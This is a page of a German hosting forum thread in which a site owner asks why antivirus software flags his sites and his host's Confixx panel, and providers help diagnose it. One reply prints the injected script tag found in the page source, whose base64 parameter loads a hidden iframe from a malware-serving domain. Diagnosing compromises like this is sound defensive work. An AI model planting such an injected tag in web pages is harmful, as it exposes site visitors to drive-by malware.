Seite 1 von 3 123 LetzteLetzte
Ergebnis 1 bis 10 von 30
11x Danke

Thema: Malware-Warnung


  1. Beiträge
    528
    Registriert seit
    20.10.2004
    Ort
    Bochum
    Alter
    44
    Vielschreiber

    Malware-Warnung

    Hallo zusammen,

    keine Ahnung, ob ich mit meinem Anliegen im richtigen Forum bin....

    Ich habe auf diversen Webseiten meines Hosters (celeros) auf einem bestimmten Sever seit 3-4 Wochen immer eine Malware-Warnung diverser AntiViren-Programme (in meinem Falle Avast).
    Anfangs tat mein Hoster das ab mit "meine Seiten haben Schadcode oder sind komprommitiert worden"... doch blöderweise erscheinen die Warnungen auch beim Aufruf der Confixx-Seite des Hosters (Servers).

    Es handelt sich um die Domains tippelsberg.de und hg-sys.de / bzw. um den Server "lennox.servertools24.de"

    Die Warnmeldung erscheint nicht direkt bei Aufruf der ersten Seiten, sondern erst bei "Aktualisieren (F5)" oder Aufruf einer weiteren Seite innerhalb der Web-Präsenz.
    Beim Aufruf der Confixx-Seite (lennox) erscheint die Meldung sofort.

    Der Hoster kommt nicht wirklich in Wallung, das Problem zu beheben. Übrigens wurde das Problem auch schon von anderen Besuchern meiner Webseite bemerkt, siehe hier: http://www.mozilo.de/forum/viewtopic.php?f=19&t=1437 (ab Seite 3)

    Kann mir/uns jemand helfen? Ist das ein Confixx-Fehler? Denn an meinen Seiten kann es nicht liegen.
    Dasselbe CMS läuft nämlich auch auf anderen Servern des Hosters, und da kommen die Warnmeldungen nicht! (Siehe z.B. labor7.de/schreiner2)

    Gruß aus Bochum,
    Thorsten
    Sei stets fair, wenn auch Du fair behandelt werden willst!

    Ruhrklang.de | Webseite.cc | wion-beats.de

  2. Registrieren, damit diese Werbung verschwindet.

  3. Beiträge
    165
    Registriert seit
    15.07.2009
    Ort
    data center
    Erfahrener Benutzer

    AW: Malware-Warnung

    Es finden keine Probleme beim aufrufen der Webseiten statt (Avast).
    Schon in betracht gezogen, dass der heimische Rechner infiziert ist?


  4. Beiträge
    528
    Registriert seit
    20.10.2004
    Ort
    Bochum
    Alter
    44
    Vielschreiber

    AW: Malware-Warnung

    Ja, klar. Aber 9 verschiedene Rechner zeigen das Phänomen an?
    Sei stets fair, wenn auch Du fair behandelt werden willst!

    Ruhrklang.de | Webseite.cc | wion-beats.de


  5. Beiträge
    2.277
    Registriert seit
    13.05.2005
    Ort
    Frankfurt am Main

    Welcome 2 Inter.Net

    Foren-Guru

    AW: Malware-Warnung

    Zitat Zitat von Pierre70 Beitrag anzeigen
    Es handelt sich um die Domains tippelsberg.de und hg-sys.de / bzw. um den Server "lennox.servertools24.de"

    Die Warnmeldung erscheint nicht direkt bei Aufruf der ersten Seiten, sondern erst bei "Aktualisieren (F5)" oder Aufruf einer weiteren Seite innerhalb der Web-Präsenz.
    Beim Aufruf der Confixx-Seite (lennox) erscheint die Meldung sofort.
    Es ist

    Code:
    <script src='/paralex.js?id=PGlmcmFtZSBzcmM9J2h0dHA6Ly9jeWJlci1mb3guY29tLzY2Ni9pbmRleC5waHAnIHN0eWxlPSdkaXNwbGF5OiBub25lJz4=;t=741'></script>
    im Sourcecode zu finden. In der Tat wird das nicht immer im Sourcecode geladen.
    ░↔░ Administration, Colocation, DDoS Mitigation, Nameserver & virtuelle Server
    ░↔░ Produkte: [url]www.welcome2inter.net/products[/url]


  6. Beiträge
    528
    Registriert seit
    20.10.2004
    Ort
    Bochum
    Alter
    44
    Vielschreiber

    AW: Malware-Warnung

    @ Mr. Brain
    Erscheint aber beim ersten Aufruf der Webseiten nicht, erst bei Aktualisierung bzw. Aufruf einer weiteren Seite der Präsenz. Und beim Aufruf der Confixx-Seite (lennox.servertools24.de) direkt.

    Dieses "paralex.js" scheint mir sehr auf Confixx (Parallels) zu schließen.
    Sei stets fair, wenn auch Du fair behandelt werden willst!

    Ruhrklang.de | Webseite.cc | wion-beats.de


  7. Beiträge
    112
    Registriert seit
    25.08.2010
    Ort
    Oberboihingen

    MTEXX IT Services GmbH

    Gepruefter Provider

    AW: Malware-Warnung

    Das Script lädt Code von der Seite "cyber-fox.com" nach, die laut diversen Virenscannern tatsächlich schädlichen Code (JS:ScriptIP-inf [Trj]) enthält. Eventuell einfach mal "paralex.js" suchen & löschen und nach der Schwachstelle suchen, über die der Code nachgeladen werden konnte. Hier wird auf der Confixx Seite keine Warnmeldung ausgegeben.

    MfG
    Geändert von mtexx.com (14.05.2012 um 11:35 Uhr)
    MTEXX IT Services GmbH - Amselweg 13 - D-72644 Oberboihingen
    Tel.: +49 7022 20805-50 | Fax.: +49 7022 20805-51
    E-Mail: Vertrieb@mtexx.com - Web: http://www.mtexx.com


  8. Beiträge
    163
    Registriert seit
    08.09.2010
    Ort
    Pasewalk

    Web-Service4U

    Gepruefter Provider

    AW: Malware-Warnung

    Guten Morgen,

    ich kann die Malware-Meldung von Avast für lennox.servertools24.de bestätigen. Wende Dich bitte an den Seitenbetreiber, da nur dieser den Schadcode entfernen kann.

    Internette Grüße
    Reiko


  9. Beiträge
    3.630
    Registriert seit
    10.06.2004
    Ort
    Rosbach bei Frankfurt

    Optimate-Server

    Gepruefter Provider

    AW: Malware-Warnung

    Was ich aber nicht verstehen kann:
    Hier macht ein netter, höflicher Mensch einen Thread auf und fragt höflich, ob andere das Problem bestätigen können und sofort wird er unhöflich angegangen. Das muss in der Tat nicht sein!!
    Und das der Threadstarter nicht daneben liegt, wie chichy anfangs behauptet, dass sein Rechner lokal infiziert sei, zeigt sich ja nun auch.
    | Homepage: http://www.optimate-server.de | Email: info@optimate-server.de |
    | Telefon: 06003 / 9344144 | Telefax: 06003 / 9344143 | ICQ: 87243150 |
    | Housing | Rootserver | Gameserver | Domains | Webspace | Voiceserver |


  10. Beiträge
    112
    Registriert seit
    25.08.2010
    Ort
    Oberboihingen

    MTEXX IT Services GmbH

    Gepruefter Provider

    AW: Malware-Warnung

    Naja, beide haben sich nicht gerade "Nettiquette" verhalten... Jetzt ist nur die Frage, was Avast hier für einen Infekt anzeigt, bei mir bleibt die Meldung bei "lennox.servertools24.de" aus (ebenfalls fehlt hier das eingebundene Script) und auch Virustotal meint dazu "0/24": https://www.virustotal.com/url/8df02...aa73/analysis/. Kann jemand mal die genaue Meldung von Avast posten?

    MfG
    MTEXX IT Services GmbH - Amselweg 13 - D-72644 Oberboihingen
    Tel.: +49 7022 20805-50 | Fax.: +49 7022 20805-51
    E-Mail: Vertrieb@mtexx.com - Web: http://www.mtexx.com


  11. Beiträge
    528
    Registriert seit
    20.10.2004
    Ort
    Bochum
    Alter
    44
    Vielschreiber

    AW: Malware-Warnung

    So, der Hoster hat sich auf meine Support-Mail noch nicht gemeldet.
    Das Problem besteht weiterhin.

    Andere Webseiten, die auf dem Server lennox.servertools24.de liegen, haben dasselbe Problem. Einfach mal nach "lennox.servertools24.de" googeln (sind aber auch viele Confixx-Blank-Seiten vorhanden).

    Das CMS, das ich auf lennox für verschiedene Webseiten nutze, wird auch auf anderen Servern des Hosters von mir eingesetzt, so u.a. auf dem Server "lex" mit den Webseiten labor7.de/cnd und labor7.de/schreiner2 (2 Seiten, die im Kundenauftrag erstellt werden).
    Bei diesen Seiten erscheint keine Malware-Warnung! Ebenso nicht auf wion-beats.de (selbes CMS, anderer Hoster).

    Ich kann nicht ansatzweise etwas "verdächtiges" im Sourcecode meiner Seiten entdecken...

    Es ist echt zum Verzweifeln...
    Geändert von [MOD] SRo (14.05.2012 um 17:48 Uhr) Grund: Unpassenden Teil entfernt
    Sei stets fair, wenn auch Du fair behandelt werden willst!

    Ruhrklang.de | Webseite.cc | wion-beats.de

Seite 1 von 3 123 LetzteLetzte

Ähnliche Themen

  1. Malware auf 1blu - Domains
    Von Experte im Forum Security
    Antworten: 1
    Letzter Beitrag: 30.07.2010, 01:29
  2. Antworten: 28
    Letzter Beitrag: 10.11.2009, 09:16
  3. Abuse an Hetzner, Malware auf vlc.de
    Von Specialkey im Forum Smalltalk
    Antworten: 4
    Letzter Beitrag: 12.06.2009, 11:20
  4. WARNUNG:Toleranzfrist Ihrer Produktlizenz, trotz neuem Key immer noch die Warnung
    Von michi-fbb im Forum Unix Allgemeine Fragen / Probleme
    Antworten: 4
    Letzter Beitrag: 10.07.2006, 08:56

Content Relevant URLs by vBSEO 3.6.0